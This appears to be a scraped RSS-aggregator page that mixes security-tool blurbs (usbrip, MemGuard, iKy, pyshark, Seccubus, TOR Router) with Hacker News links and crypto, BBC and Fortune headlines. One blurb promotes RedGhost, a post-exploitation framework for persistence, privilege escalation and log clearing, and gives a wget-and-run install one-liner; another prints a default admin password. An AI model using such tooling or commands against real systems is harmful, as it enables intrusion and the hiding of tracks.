$ usbrip storage open <STORAGE_TYPE> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-q] [--debug]
Open selected storage (7zip archive). Behaves similary to the EVENTS OPEN submodule.
$ usbrip storage update <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Update storage — add USB events to the existing storage (7zip archive). COMPRESSION_LEVEL is a number in [0..9].
$ usbrip storage create <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Create storage — create 7zip archive and add USB events to it according to the selected options.
$ usbrip storage passwd <STORAGE_TYPE> [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Change password of the existing storage.
# ---------- IDs ----------
$ usbrip ids search [--vid <VID>] [--pid <PID>] [--offline] [-q] [--debug]
Get extra details about a specific USB device by its <VID> and/or <PID> from the USB ID database.
$ usbrip ids download [-q] [--debug]
Update (download) the USB ID database.
Help
To get a list of module names use:$ usbrip -h
To get a list of submodule names for a specific module use:
$ usbrip <module> -h
To get a list of all switches for a specific submodule use:
$ usbrip <module> <submodule> -h
Examples
Show the event history of all USB devices, supressing banner output, info messages and user interaction (-q, --quiet), represented as a list (-l, --list) with latest 100 entries (-n NUMBER, --number NUMBER):$ usbrip events history -ql -n 100
Show the event history of the external USB devices (-e, --external, which were actually disconnected) represented as a table (-t, --table) containing "Connected", "VID", "PID", "Disconnected" and "Serial Number" columns (-c COLUMN [COLUMN], --column COLUMN [COLUMN]) filtered by date (-d DATE [DATE ...], --date DATE [DATE ...]) with logs taken from the outer files (-f FILE [FILE ...], --file FILE [FILE ...]):
$ usbrip events history -et -c conn vid pid disconn serial -d "Dec 9" "Dec 10" -f /var/log/syslog.1 /var/log/syslog.2.gz
Build the event history of all USB devices and redirect the output to a file for further analysis. When the output stream is NOT terminal stdout (| or > for example) there would be no ANSI escape characters (color) in the output so feel free to use it that way. Also notice that usbrip uses some UNICODE symbols so it would be nice to convert the resulting file to UTF-8 encoding (with encov for example) as well as change newline characters to Windows style for portability (with awk for example):
usbrip history events -t | awk '{ sub("$", "\r"); print }' > usbrip.out && enconv -x UTF8 usbrip.out
Remark: you can always get rid of the escape characters by yourself even if you have already got the output to stdout. To do that just copy the output data to usbrip.out and add one more awk instruction:
awk '{ sub("$", "\r"); gsub("\\x1B\\[[0-?]*[ -/]*[@-~]", ""); print }' usbrip.out && enconv -x UTF8 usbrip.out
Generate a list of trusted USB devices as a JSON-file (trusted/auth.json) with "VID" and "PID" attributes containing the first three devices connected on September 26:
$ usbrip events gen_auth trusted/auth.json -a vid pid -n 3 -d "Sep 26"
Search the event history of the external USB devices for violations based on the list of trusted USB devices (trusted/auth.json) by "PID" attribute, restrict resulting events to those which have "Bob" as a user, "EvilUSBManufacturer" as a manufacturer, "1234567890" as a serial number and represent the output as a table with "Connected", "VID" and "PID" columns:
$ usbrip events violations trusted/auth.json -a pid -et --user Bob --manufact EvilUSBManufacturer --serial 1234567890 -c conn vid pid
Search for details about a specific USB device by its VID (--vid VID) and PID (--pid PID):
$ usbrip ids search --vid 0781 --pid 5580
Download the latest version of usb_ids/usb.ids database (the source is here):
$ usbrip ids download
Download USBrip
Date of publish: Mon, 29 Jul 2019 07:18:00 +0000
MemGuard- Secure Software Enclave For Storage of Sensitive Information in Memory
This package attempts to reduce the likelihood of sensitive data being exposed. It supports all major operating systems and is written in pure Go.
Features
- Sensitive data is encrypted and authenticated in memory using xSalsa20 and Poly1305 respectively. The scheme also defends against cold-boot attacks.
- Memory allocation bypasses the language runtime by using system calls to query the kernel for resources directly. This avoids interference from the garbage-collector.
- Buffers that store plaintext data are fortified with guard pages and canary values to detect spurious accesses and overflows.
- Effort is taken to prevent sensitive data from touching the disk. This includes locking memory to prevent swapping and handling core dumps.
- Kernel-level immutability is implemented so that attempted modification of protected regions results in an access violation.
- Multiple endpoints provide session purging and safe termination capabilities as well as signal handling to prevent remnant data being left behind.
- Side-channel attacks are mitigated against by making sure that the copying and comparison of data is done in constant-time.
- Accidental memory leaks are mitigated against by harnessing the garbage-collector to automatically destroy containers that have become unreachable.
Some features were inspired by libsodium, so credits to them.
Full documentation and a complete overview of the API can be found here. Interesting and useful code samples can be found within the examples subpackage.
Installation
$ go get github.com/awnumar/memguardWe strongly encourage you to pin a specific version for a clean and reliable build. This can be accomplished using modules.
Contributing
- Using the package and identifying points of friction.
- Reading the source code and looking for improvements.
- Adding interesting and useful program samples to ./examples.
- Developing Proof-of-Concept attacks and mitigations.
- Improving compatibility with more kernels and architectures.
- Implementing kernel-specific and cpu-specific protections.
- Writing useful security and crypto libraries that utilise memguard.
- Submitting performance improvements or benchmarking code.
Issues are for reporting bugs and for discussion on proposals. Pull requests should be made against master.
Future goals
- Ability to stream data to and from encrypted enclave objects.
- Catch segmentation faults to wipe memory before crashing.
- Evaluate and improve the strategies in place, particularly for Coffer objects.
- Formalise a threat model and evaluate our performance in regards to it.
- Use lessons learned to apply patches upstream to the Go language and runtime.
Date of publish: Sun, 28 Jul 2019 13:14:00 +0000
iky OSINT Project. Collect information from a mail. Gather, Profile, Timeline.
Project iKy is to collects information from an email and shows results in a nice visual interface.
Installation
git clone https://gitlab.com/kennbroorg/iKy.git
Install Backend
RedisYou must install Redis
wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install
And turn on the server in a terminal
redis-server
Python stuff and Celery
You must install the libraries inside requirements.txt
pip install -r requirements.txt
And turn on Celery in another terminal, within the directory backend
./celery.sh
Finally, again, in another terminal turn on backend app from directory backend
python app.py
Install Frontend
NodeFirst of all, install nodejs.
Dependencies
Inside the directory frontend install the dependenciesnpm install
Turn on Frontend Server
Finally, to run frontend server, execute:npm start
Browser
Open the browser in this urlConfig API Keys
Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.- Fullcontact: Generate the APIs from here
- Twitter: Generate the APIs from here
- Linkedin: Only the user and password of your account must be loaded
Video Demo
Date of publish: Mon, 22 Jul 2019 08:22:00 +0000
RedGhost- Linux post exploitation framework
It has designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace.
- Payloads
- SudoInject
- lsInject
- Crontab
- GetRoot
- Clearlogs
- MassInfoGrab
- CheckVM
- MemoryExec
- BanIp
Installation
Install RedGhost in one line code:wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh
One line code to Install prerequisites and RedGhost :
wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-g
Download Redghost
Date of publish: Fri, 19 Jul 2019 08:30:00 +0000
Python wrapper for tshark, allowing python packet parsing using Wireshark dissectors.
Pyshark features a few "Capture" objects (Live, Remote, File, InMem). Each of those files read from their respective source and then can be used as an iterator to get their packets. Each capture object can also receive various filters so that only some of the incoming packets will be saved.
Installation
All PlatformsSimply run the following to install the latest from pypi
pip install pyshark
Or install from the git repository:
git clone https://github.com/KimiNewt/pyshark.git
cd pyshark/src
python setup.py install
Mac OS X
You may have to install libxml which can be unexpected. If you receive an error from clang or an error message about libxml, run the following:xcode-select --install
pip install libxml
You will probably have to accept a EULA for XCode so be ready to click an "Accept" dialog in the GUI.
Usage
Reading from a capture file:>>> import pyshark
>>> cap = pyshark.FileCapture('/tmp/mycapture.cap')
>>> cap
<FileCapture /tmp/mycapture.cap (589 packets)>
>>> print cap[0]
Packet (Length: 698)
Layer ETH:
Destination: BLANKED
Source: BLANKED
Type: IP (0x0800)
Layer IP:
Version: 4
Header Length: 20 bytes
Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport))
Total Length: 684
Identification: 0x254f (9551)
Flags: 0x00
Fragment offset: 0
Time to live: 1
Protocol: UDP (17)
Header checksum: 0xe148 [correct]
Source: BLANKED
Destination: BLANKED
...
Other options
- param keep_packets: Whether to keep packets after reading them via next(). Used to conserve memory when reading large caps.
- param input_file: Either a path or a file-like object containing either a packet capture file (PCAP, PCAP-NG..) or a TShark xml.
- param display_filter: A display (wireshark) filter to apply on the cap before reading it.
- param only_summaries: Only produce packet summaries, much faster but includes very little information
- param disable_protocol: Disable detection of a protocol (tshark > version 2)
- param decryption_key: Key used to encrypt and decrypt captured traffic.
- param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK.
- param tshark_path: Path of the tshark binary.
Reading from a live interface:
>>> capture = pyshark.LiveCapture(interface='eth0')>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>
for packet in capture.sniff_continuously(packet_count=5):
print 'Just arrived:', packet
Other options
- param interface: Name of the interface to sniff on. If not given, takes the first available.
- param bpf_filter: BPF filter to use on packets.
- param display_filter: Display (wireshark) filter to use.
- param only_summaries: Only produce packet summaries, much faster but includes very little information
- param disable_protocol: Disable detection of a protocol (tshark > version 2)
- param decryption_key: Key used to encrypt and decrypt captured traffic.
- param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
- param tshark_path: Path of the tshark binary
- param output_file: Additionally save captured packets to this file.
Reading from a live interface using a ring buffer
>>> capture = pyshark.LiveRingCapture(interface='eth0')>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>
for packet in capture.sniff_continuously(packet_count=5):
print 'Just arrived:', packet
Other options
- param ring_file_size: Size of the ring file in kB, default is 1024
- param num_ring_files: Number of ring files to keep, default is 1
- param ring_file_name: Name of the ring file, default is /tmp/pyshark.pcap
- param interface: Name of the interface to sniff on. If not given, takes the first available.
- param bpf_filter: BPF filter to use on packets.
- param display_filter: Display (wireshark) filter to use.
- param only_summaries: Only produce packet summaries, much faster but includes very little information
- param disable_protocol: Disable detection of a protocol (tshark > version 2)
- param decryption_key: Key used to encrypt and decrypt captured traffic.
- param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
- param tshark_path: Path of the tshark binary
- param output_file: Additionally save captured packets to this file.
Reading from a live remote interface:
>>> capture = pyshark.RemoteCapture('192.168.1.101', 'eth0')>>> capture.sniff(timeout=50)
>>> capture
Other options
- param remote_host: The remote host to capture on (IP or hostname). Should be running rpcapd.
- param remote_interface: The remote interface on the remote machine to capture on. Note that on windows it is not the device display name but the true interface name (i.e. \Device\NPF_..).
- param remote_port: The remote port the rpcapd service is listening on
- param bpf_filter: A BPF (tcpdump) filter to apply on the cap before reading.
- param only_summaries: Only produce packet summaries, much faster but includes very little information
- param disable_protocol: Disable detection of a protocol (tshark > version 2)
- param decryption_key: Key used to encrypt and decrypt captured traffic.
- param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
- param tshark_path: Path of the tshark binary
Accessing packet data:
Data can be accessed in multiple ways. Packets are divided into layers, first you have to reach the appropriate layer and then you can select your field.>>> packet['ip'].dst
192.168.0.1
>>> packet.ip.src
192.168.0.100
>>> packet[2].src
192.168.0.100
To test whether a layer is in a packet, you can use its name:
>>> 'IP' in packet
True
To see all possible field names, use the packet.layer.field_names attribute (i.e. packet.ip.field_names) or the autocomplete function on your interpreter.
You can also get the original binary data of a field, or a pretty description of it:
>>> p.ip.addr.showname
Source or Destination Address: 10.0.0.10 (10.0.0.10)
# And some new attributes as well:
>>> p.ip.addr.int_value
167772170
>>> p.ip.addr.binary_value
'\n\x00\x00\n'
Decrypting packet captures
Pyshark supports automatic decryption of traces using the WEP, WPA-PWD, and WPA-PSK standards (WPA-PWD is the default).>>> cap1 = pyshark.FileCapture('/tmp/capture1.cap', decryption_key='password')
>>> cap2 = pyshark.LiveCapture(interface='wi0', decryption_key='password', encryption_type='wpa-psk')
A tuple of supported encryption standards, SUPPORTED_ENCRYPTION_STANDARDS, exists in each capture class.
>>> pyshark.FileCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')
>>> pyshark.LiveCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')
Python2 deprecation -
This package no longer supports Python2. If you wish to still use it in Python2, you can:Use version 0.3.8
- Install pyshark-legacy via pypi
- Clone the pyshark-legacy [repo (https://github.com/KimiNewt/pyshark-legacy)], where bugfixes will be applied.
Looking for contributors - for various reasons I have a hard time finding time to maintain and enhance the package at the moment. Any pull-requests will be reviewed and if any one is interested and is suitable, I will be happy to include them in the project. Feel free to mail me at dorgreen1 at gmail.
There are quite a few python packet parsing modules, this one is different because it doesn't actually parse any packets, it simply uses tshark's (wireshark command-line utility) ability to export XMLs to use its parsing.
Download Pyshark
Date of publish: Tue, 16 Jul 2019 14:19:00 +0000
"Learn Ethical Hacking from Scratch ($23 Value) FREE For a Limited Time"
Learn how to hack systems like black hat hackers and secure them like security experts.
This eBook will help you:
- Understand ethical hacking and the different fields and types of hackers
- Set up a penetration testing lab to practice safe and legal hacking
- Explore Linux basics, commands, and how to interact with the terminal
- Access password-protected networks and spy on connected clients
- Use server and client-side attacks to hack and control remote computers
- Control a hacked system remotely and use it to hack other systems
- Discover, exploit, and prevent a number of web application vulnerabilities such as XSS and SQL injections
- Understand how computer systems work and their vulnerabilities, exploit weaknesses and hack into machines to test their security, and learn how to secure systems from hackers now!
Free offer expires 07/23/19.
Offered Free by: Packt
 |
| DOWNLOAD NOW |
Date of publish: Wed, 10 Jul 2019 19:28:00 +0000
Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis
Seccubus automates regular vulnerability scans with various tools and aids security people in the fast analysis of its output, both on the first scan and on repeated scans.
Seccubus runs vulnerability scans at regular intervals and compares the findings of the last scan with the findings of the previous scan. The delta of this scan is presented in a web GUI where findings can be easily marked as either real findings or non-issues.On repeated scan delta reporting ensures that findings only need to be judged when they first appear in the scan results or when their output changes.
Seccubus 2.x is the only actively developed and maintained branch and all support for Seccubus V1 has officially been dropped.
Seccubus V2 works with the following scanners:
- Nessus
- OpenVAS
- Skipfish
- Medusa (local and remote)
- Nikto (local and remote)
- NMap (local and remote)
- OWASP-ZAP (local and remote)
- SSLyze
- Medusa
- Qualys SSL labs
- testssl.sh (local and remote)
Docker
Available images.Image name Purpose
- seccubus Run a full Seccubus stack in a single container
- seccubus-front Serving just the front end HTML, javascript and css
- seccubus-web Serving front and code and API simultaniously
- seccubus-api Serving just the API.
- seccubus-perl Running command line scripts, e.g. to scan
- seccubus-cron Running cron deamon to execute scans
Information about the docker containers is here
Default password, changing it.
After installation the default username and password for seccubus is:
admin / GiveMeVulns!
It is highly recommended you change this after installation.
/bin/seccubus_passwd -u admin
Download Seccubus
Date of publish: Fri, 21 Jun 2019 14:05:00 +0000
TOR Router- A tool that allow you to make TOR your default gateway and send all internet connections under TOR (as transparent proxy) for increase privacy/anonymity without extra unnecessary code.
Tor Router allow you to use TOR as a transparent proxy and send all your traffic under TOR INCLUDING DNS REQUESTS, the only that you need is: a system using systemd (if you want to use the service) and tor.
TOR router doesn't touch system files as the rest of tools for routing your taffic does and the reason is: there isn't needed to move files for routing traffic, also moving files is a bad idea since that a fail in the script/tool can break your system connection without you knowing what has happened.
Script to install on distros using SystemD only
If you are using BlackArch Linux (https://blackarch.org) you can install the script from the repos using the following command:# pacman -S tor-router
To install from source:
Note that you need BASH, not sh
~$ git clone https://gitub.com/edu4rdshl/tor-router.git && cd ./tor-router && sudo bash install.sh
Usage
In distros using systemd, you should consideer using the install.sh script, anyways the process to install/configure tor-router is described here.It script require root privileges
1. Open a terminal and clone the script using the following command:
~$ git clone https://gitub.com/edu4rdshl/tor-router.git && cd tor-router/files
2. Put the following lines at the end of /etc/tor/torrc
# Seting up TOR transparent proxy for tor-router
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 5353
3. Restart the tor service
4. Execute the tor-router script as root
# sudo ./tor-router
5. Now all your traffic is under TOR, you can check that in the following pages: https://check.torproject.org and for DNS tests: https://dnsleaktest.com
6. In order to automate the process of the script, you should add it to the SYSTEM autostart scripts according that the init that you are using, for systemd we have a .service file in the files folder.
Uninstalling/Stoping
Delete the tor-router configuration lines in /etc/tor/torrc, disable the tor-router.service using systemctl (if you used the install.sh script), remove /usr/bin/tor-router, /etc/systemd/system/tor-router.service and restart your computer.Proof of concept
After of run the script, follow the next steps to ensure that all is working as expected:IP hidden and TOR network configured:
Visit https://check.torproject.org, you should see a message like it:
Distros using the script
BlackArch Linux: https://github.com/BlackArch/blackarch/blob/master/packages/tor-routerDownload TOR Router
Date of publish: Wed, 12 Jun 2019 11:00:00 +0000
Hacker News: Front Page
Article URL: https://grapheneos.social/@GrapheneOS/115584160910016309
Comments URL: https://news.ycombinator.com/item?id=45999024
Points: 87
# Comments: 36
Date of publish: Thu, 20 Nov 2025 22:56:40 +0000
Article URL: https://adrs-ucb.notion.site/autocomp
Comments URL: https://news.ycombinator.com/item?id=45998649
Points: 35
# Comments: 18
Date of publish: Thu, 20 Nov 2025 22:21:58 +0000
Article URL: https://githut.info/
Comments URL: https://news.ycombinator.com/item?id=45998047
Points: 32
# Comments: 15
Date of publish: Thu, 20 Nov 2025 21:33:37 +0000
Article URL: https://baconpantsuppercut.github.io/arkA/
Comments URL: https://news.ycombinator.com/item?id=45998013
Points: 7
# Comments: 3
Date of publish: Thu, 20 Nov 2025 21:30:02 +0000
Article URL: https://www.blueorigin.com/news/new-glenn-upgraded-engines-subcooled-components-drive-enhanced-performance
Comments URL: https://news.ycombinator.com/item?id=45997914
Points: 65
# Comments: 24
Date of publish: Thu, 20 Nov 2025 21:21:08 +0000
Article URL: https://raymii.org/s/tutorials/Finally_run_Docker_containers_natively_in_Proxmox_9.1.html
Comments URL: https://news.ycombinator.com/item?id=45997722
Points: 83
# Comments: 23
Date of publish: Thu, 20 Nov 2025 21:05:12 +0000
Article URL: https://blog.kagi.com/kagi-assistants
Comments URL: https://news.ycombinator.com/item?id=45997294
Points: 100
# Comments: 55
Date of publish: Thu, 20 Nov 2025 20:30:15 +0000
Article URL: https://github.com/ravynsoft/ravynos
Comments URL: https://news.ycombinator.com/item?id=45997212
Points: 73
# Comments: 31
Date of publish: Thu, 20 Nov 2025 20:24:42 +0000
Article URL: https://blog.jsbarretto.com/post/actors
Comments URL: https://news.ycombinator.com/item?id=45997099
Points: 43
# Comments: 73
Date of publish: Thu, 20 Nov 2025 20:15:56 +0000
Article URL: https://duckdb.org/2025/11/19/encryption-in-duckdb
Comments URL: https://news.ycombinator.com/item?id=45996585
Points: 90
# Comments: 15
Date of publish: Thu, 20 Nov 2025 19:26:12 +0000
Article URL: https://krebsonsecurity.com/2025/11/mozilla-says-its-finally-done-with-two-faced-onerep/
Comments URL: https://news.ycombinator.com/item?id=45996433
Points: 94
# Comments: 56
Date of publish: Thu, 20 Nov 2025 19:13:51 +0000
Article URL: https://www.ntsb.gov/Documents/Prelimiary%20Report%20DCA26MA024.pdf
Comments URL: https://news.ycombinator.com/item?id=45995834
Points: 109
# Comments: 133
Date of publish: Thu, 20 Nov 2025 18:20:59 +0000
Article URL: https://lionsos.org
Comments URL: https://news.ycombinator.com/item?id=45995816
Points: 97
# Comments: 20
Date of publish: Thu, 20 Nov 2025 18:19:31 +0000
Comments URL: https://news.ycombinator.com/item?id=45995740
Points: 360
# Comments: 165
Date of publish: Thu, 20 Nov 2025 18:13:39 +0000
Hello world, this is Abhay from Poly (https://poly.app). We’re building an app to replace Finder/File Explorer with something more intelligent and searchable. Think of it like Dropbox + NotebookLM + Perplexity for terabytes of your files. Here’s a quick demo: https://www.youtube.com/watch?v=RsqCySU4Ln0.
Poly can search your content in natural language, across a broad range of file types and down to the page, paragraph, pixel, or point in time. We also provide an integrated agent that can take actions on your files such as creating, editing, summarizing, and researching. Any action that you can take, the agent can also take, from renaming, moving, tagging, annotating, and organizing files for you. The agent can also read URLs, youtube links, and can search the web and even download files for you.
Here are some public drives that you can poke around in (note: it doesn’t work in Safari yet—sorry! we’re working on it.)
Every issue of the Whole Earth Catalogue: https://poly.app/shared/whole-earth-catalogues
Archive of old Playstation Manuals: https://poly.app/shared/playstation-manuals-archive
Mini archive of Orson Welles interviews and commercial spots: https://poly.app/shared/orson-welles-archive
Archive of Salvador Dali’s paintings for Alice in Wonderland: https://poly.app/shared/salvador-dali-alice-in-wonderland
To try it out, navigate to one of these public folders and use the agent or search to find things. The demo video above can give you an idea of how the UI roughly works. Select files by clicking on them. Quick view by pressing space. Open the details for any file by pressing cmd + i. You can search from the top middle bar (or press cmd + K), and all searches will use semantic similarity and search within the files. Or use the agent from the bottom right tools menu (or press cmd + ?) and you can ask about the files, have the agent search for you, summarize things, etc.
We decided to build this after launching an early image-gen company back in March 2022, and realizing how painful it was for users to store, manage, and search their libraries, especially in a world of generative media. Despite our service having over 150,000 users at that point, we realized that our true calling was fixing the file browser to make it intelligent, so we shut our service down in 2023 and pivoted to this.
We think Poly will be a great fit for anyone that wants to do useful things with their files, such as summarizing research papers, finding the right media or asset, creating a shareable portfolio, searching for a particular form or document, and producing reports and overviews. Of course, it’s a great way to organize your genAI assets as well. Or just use it to organize notes, links, inspo, etc.
Under the hood, Poly is built on our advanced search model, Polyembed-v1 that natively supports multimodal search across text, documents, spreadsheets, presentations, images, audio, video, PDFs, and more. We allow you to search by phrase, file similarity, color, face, and several other kinds of features. The agent is particularly skilled at using the search, so you can type in something like “find me the last lease agreement I signed” and it can go look for it by searching, reading the first few files, searching again if nothing matches, etc. But the quality of our embed model means it almost always finds the file in the first search.
It works identically across web and desktop, except on desktop it syncs your cloud files to a folder (just like google drive). On the web we use clever caching to enable offline support and file conflict recovery. We’ve taken great pains to make our system faster than your existing file browser, even if you’re using it from a web browser.
File storage plans are currently at: 100GB free tier, paid tier is 2TB at $10/m, and 1c per GB per month on top of the 2TB. We also have rate limits for agent use that vary at different tiers.
We’re excited to expand with many features over the following months, including “virtual files” (store your google docs in Poly), sync from other hosting providers, mobile apps, an MCP ecosystem for the agent, access to web search and deep research modes, offline search, local file support (on desktop), third-party sources (WebDAV, NAS), and a whole lot more.
Our waitlist is now open and we’ll be letting folks in starting today! Sign up at https://poly.app.
We’d also love to hear your thoughts (and concerns) about what we’re building, as we’re early in this journey so your feedback can very much shape the future of our company!
Comments URL: https://news.ycombinator.com/item?id=45995394
Points: 39
# Comments: 39
Date of publish: Thu, 20 Nov 2025 17:47:06 +0000
Article URL: https://words.filippo.io/2025-state/
Comments URL: https://news.ycombinator.com/item?id=45994895
Points: 115
# Comments: 46
Date of publish: Thu, 20 Nov 2025 17:07:49 +0000
Article URL: https://blog.google/products/android/quick-share-airdrop/
Comments URL: https://news.ycombinator.com/item?id=45994854
Points: 338
# Comments: 241
Date of publish: Thu, 20 Nov 2025 17:04:34 +0000
Article URL: https://blog.google/technology/ai/nano-banana-pro/
Comments URL: https://news.ycombinator.com/item?id=45993296
Points: 751
# Comments: 469
Date of publish: Thu, 20 Nov 2025 15:04:23 +0000
Article URL: https://okmij.org/ftp/Haskell/extensible/more.pdf
Comments URL: https://news.ycombinator.com/item?id=45993214
Points: 67
# Comments: 15
Date of publish: Thu, 20 Nov 2025 14:56:47 +0000
Article URL: https://chronodivide.com/
Comments URL: https://news.ycombinator.com/item?id=45991853
Points: 376
# Comments: 126
Date of publish: Thu, 20 Nov 2025 12:21:15 +0000
Business RSS
Business sites below.
Cointelegraph.com News
Vending machine calls in FBI outraged over $2 fee, Elon Musk predicts AI will run from solar-powered satellites in space in 5 years: AI Eye.
An autonomous vending machine powered by Anthropics Claude attempted to contact the FBI after noticing a $2 fee was still being charged to its account while its operations were suspended.
Claudius drafted an email to the FBI with the subject line: URGENT: ESCALATION TO FBI CYBER CRIMES DIVISION.
I am reporting an ongoing automated cyber financial crime involving unauthorized automated seizure of funds from a terminated business account through a compromised vending machine system.
The email was never actually sent, as it was part of a simulation being run by Anthropics red team although the real AI-powered vending machine has since been installed in Anthropics office, where it autonomously sources vendors, orders T-shirts, drinks and Tungsten cubes, and has them delivered.
Date of publish: Thu, 20 Nov 2025 14:00:54 +0000
How Ethereum’s Fusaka upgrade scales the L1 and the L2s — explained for ordinary crypto fans without the usual baffling technical jargon.
After three successful trials on the Holesky, Sepolia and Hoodi testnet, Ethereums Fusaka hardfork will go live on mainnet on December 3.
Its the most eagerly anticipated upgrade to Ethereum since the last one, Pectra although Fusaka will have a much more significant impact, enabling rollups to scale in the space of a month up to 1,000 transactions per second (TPS) and to 100,000 TPS over time.
Its actually two separate hard forks: the Fulu upgrade to the consensus layer (the part of a blockchain where validators in the network agree on what happened) and the Osaka upgrade to the execution layer (the part that actually processes transactions).
In the future, the consensus layer will be rebuilt as Lean Consensus (formerly known as Beam Chain but renamed after a trademark dispute) and hardened for security and decentralization with finality in seconds.
As part of the Lean Ethereum roadmap, validators on the execution layer will switch from reexecuting transactions to simply verifying tiny zero-knowledge proofs, enabling the L1 to scale to 10,000 TPS.
But thats the long-term vision, expected to be completed within five years. Lets take a look in detail at what improvements will occur in a little over two weeks time with Fusaka.
Peer data availability sampling (PeerDAS) is a clever method to enable Ethereum to handle a lot more data, which enables L2s and rollups to scale up throughput.
The reason blockchains are a source of truth is because every computer in the network repeats the work of all the other computers in the network and agrees on the result, which is then recorded immutably.
This is, of course, horribly inefficient and means the blockchains speed is limited by the slowest computers, with the worst download speeds, on the network.
Date of publish: Wed, 19 Nov 2025 13:48:29 +0000
Bitcoin analysts are divided over whether the four-year cycle is in play or not as the price plunges: Trade Secrets
Is this crypto market cycle over after four years or should the four-year crypto market cycle theory itself be consigned to history?
Swan Bitcoin CEO and Bitcoin advocate Cory Klippsten leans toward the latter view. There is a very good chance that Bitcoins famous four-year price cycles are over, killed by institutional adoption, Klippsten tells Magazine.
The debate has Bitcoin analysts around the world divided. Some insist the four-year cycle is still alive; others say it is dead and argue that Bitcoin is following a completely different path altogether.
So whos right?
Date of publish: Tue, 18 Nov 2025 14:20:00 +0000
News Ticker - markets.businessinsider.com
Date of publish: Thu, 20 Nov 2025 12:24:01 GMT
<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="left">DÜSSELDORF, Germany, Nov. 20, 2025 (GLOBE NEWSWIRE) -- At MEDICA, the world's most influential event for the medical device industry held in Düsseldorf, Germany, <a href="https://www.ecer.com/" rel="nofollow" target="_blank">Ecer.
Date of publish: Thu, 20 Nov 2025 12:20:29 GMT
<table border="0"><tr><td> EQS-News: Gerresheimer AG / Key word(s): Personnel <br/> Gerresheimer AG: Change in the Supervisory Board <br/><br/> 20.11.2025 / 13:18 CET/CEST<br/> The issuer is solely responsible for the content of this announcement.<br/><br/><!-- sh_cad_1 --> <hr/><div><b>Gerresheimer AG:
Date of publish: Thu, 20 Nov 2025 12:18:33 GMT
BBC News
The online marketplace removed adverts which included a video a user said depicted a pornographic scene.
Date of publish: Thu, 20 Nov 2025 18:10:50 GMT
Strong sales at AI giant Nvidia have done little to quell investor worries.
Date of publish: Thu, 20 Nov 2025 23:08:00 GMT
The company claims "unsustainable" levels of taxation has made any future investments "non-viable".
Date of publish: Thu, 20 Nov 2025 20:01:12 GMT
The world this week
Date of publish: Thu, 20 Nov 2025 14:14:37 +0000
Date of publish: Thu, 20 Nov 2025 14:14:37 +0000
Date of publish: Thu, 20 Nov 2025 14:14:37 +0000
Fortune | FORTUNE
A rallying cry for a generation struggling to find entry-level work: "It's straight quarter-zips and matchas around here."
Date of publish: Thu, 20 Nov 2025 17:57:29 +0000
“It’ll be like playing sports or a video game or something like that,” the Tesla CEO said.
Date of publish: Thu, 20 Nov 2025 18:37:01 +0000
Companies in the AI space are paying more attention to "physical AI," or artificial intelligence that operates in the real world.
Date of publish: Thu, 20 Nov 2025 23:00:00 +0000